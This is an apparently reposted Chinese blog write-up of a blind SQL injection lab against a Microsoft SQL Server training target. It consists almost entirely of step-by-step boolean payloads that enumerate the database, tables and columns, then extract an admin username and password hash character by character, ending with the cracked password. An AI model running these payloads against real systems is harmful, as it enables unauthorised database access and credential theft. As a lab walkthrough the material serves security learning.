1.判断是否存在注入
'
and 1=1
and 1=2
2.猜解数据库名
and exists(select top 1 name from Master..SysDatabases where unicode(substring(name,1,1))=109)
and exists(select top 1 name from Master..SysDatabases where unicode(substring(name,2,1))=111)
.......
and exists(select top 1 name from Master..SysDatabases where unicode(substring(name,1,1))=111 and name not in ('mozhe_db_v2.dbo.sysobjects'))
3.猜解表名
and exists(select top 1 name from mozhe_db_v2.dbo.sysobjects where unicode(substring(name,1,1))=109)
and exists(select top 1 name from mozhe_db_v2.dbo.sysobjects where unicode(substring(name,1,1))=109 and name not in ('manage'))
4.猜解列名
and exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'manage') and unicode(substring(name,1,1))=117)
5.逐字猜解数据
and exists(select id from manage where unicode(substring(username,1,1))=97 and ID=1)
and exists(select id from manage where unicode(substring(username,2,1))=100 and ID=1)
and exists(select id from manage where unicode(substring(username,3,1))=109 and ID=1)
and exists(select id from manage where unicode(substring(username,4,1))=105 and ID=1)
and exists(select id from manage where unicode(substring(username,5,1))=110 and ID=1)
and exists(select id from manage where unicode(substring(username,6,1))=95 and ID=1)
and exists(select id from manage where unicode(substring(username,7,1))=109 and ID=1)
and exists(select id from manage where unicode(substring(username,8,1))=122 and ID=1)
最后得到的username值是:admin_mz
and exists(select id from manage where unicode(substring(password,1,1))=55 and ID=1)
and exists(select id from manage where unicode(substring(password,2,1))=50 and ID=1)
and exists(select id from manage where unicode(substring(password,3,1))=101 and ID=1)
and exists(select id from manage where unicode(substring(password,4,1))=49 and ID=1)
and exists(select id from manage where unicode(substring(password,5,1))=98 and ID=1)
and exists(select id from manage where unicode(substring(password,6,1))=102 and ID=1)
and exists(select id from manage where unicode(substring(password,7,1))=99 and ID=1)
and exists(select id from manage where unicode(substring(password,8,1))=51 and ID=1)
and exists(select id from manage where unicode(substring(password,9,1))=102 and ID=1)
and exists(select id from manage where unicode(substring(password,10,1))=48 and ID=1)
and exists(select id from manage where unicode(substring(password,11,1))=49 and ID=1)
and exists(select id from manage where unicode(substring(password,12,1))=98 and ID=1)
and exists(select id from manage where unicode(substring(password,13,1))=55 and ID=1)
and exists(select id from manage where unicode(substring(password,14,1))=53 and ID=1)
and exists(select id from manage where unicode(substring(password,15,1))=56 and ID=1)
and exists(select id from manage where unicode(substring(password,16,1))=51 and ID=1)
最后得到的password值是:72e1bfc3f01b7583 解密:97285101
原文地址:https://www.cnblogs.com/ling-chen/p/15672699.html
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。